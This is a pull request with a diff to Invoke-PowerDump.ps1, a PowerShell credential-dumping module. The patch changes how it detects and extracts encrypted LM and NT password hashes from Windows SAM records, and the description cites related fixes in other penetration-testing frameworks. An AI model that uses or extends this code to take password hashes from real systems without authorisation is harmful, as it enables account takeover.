### PR TITLE
Invoke-PowerDump bug - corrupt hash fix

### DIFF
--- a/data/module_source/credentials/Invoke-PowerDump.ps1
+++ b/data/module_source/credentials/Invoke-PowerDump.ps1
@@ -411,14 +411,30 @@ namespace PowerDump
         function Get-UserHashes($u, [byte[]]$hbootkey)
         {
             [byte[]]$enc_lm_hash = $null; [byte[]]$enc_nt_hash = $null;
-            if ($u.HashOffset + 0x28 -lt $u.V.Length)
+            
+            # check if hashes exist (if byte memory equals to 20, then we've got a hash)
+            $LM_exists = $false;
+            $NT_exists = $false;
+            # LM header check
+            if ($u.V[0xa0..0xa3] -eq 20)
+            {
+                $LM_exists = $true;
+            }
+            # NT header check
+            elseif ($u.V[0xac..0xaf] -eq 20)
+            {
+                $NT_exists = $true;
+            }
+        
+            if ($LM_exists -eq $true)
             {
                 $lm_hash_offset = $u.HashOffset + 4;
                 $nt_hash_offset = $u.HashOffset + 8 + 0x10;
                 $enc_lm_hash = $u.V[$($lm_hash_offset)..$($lm_hash_offset+0x0f)];
                 $enc_nt_hash = $u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
             }
-            elseif ($u.HashOffset + 0x14 -lt $u.V.Length)
+        	
+            elseif ($NT_exists -eq $true)
             {
                 $nt_hash_offset = $u.HashOffset + 8;
                 $enc_nt_hash = [byte[]]$u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];


### PR DESCRIPTION
Fixed the bug where the hashes are not being extracted correctly when LM is disabled and history is enabled.

Rather than relying on length, LM and NT headers are checked. Four bytes at 0xa0 show if LM exists and four bytes at 0xac show if NT exists. Details on this known issue can be found in the following whitepaper from blackhat:
https://media.blackhat.com/bh-us-12/Briefings/Reynolds/BH_US_12_Reynods_Stamp_Out_Hash_WP.pdf

This same bug has been fixed in other frameworks sharing the code:
https://github.com/rapid7/metasploit-framework/pull/4233
https://github.com/trustedsec/social-engineer-toolkit/pull/98
https://github.com/samratashok/nishang/pull/3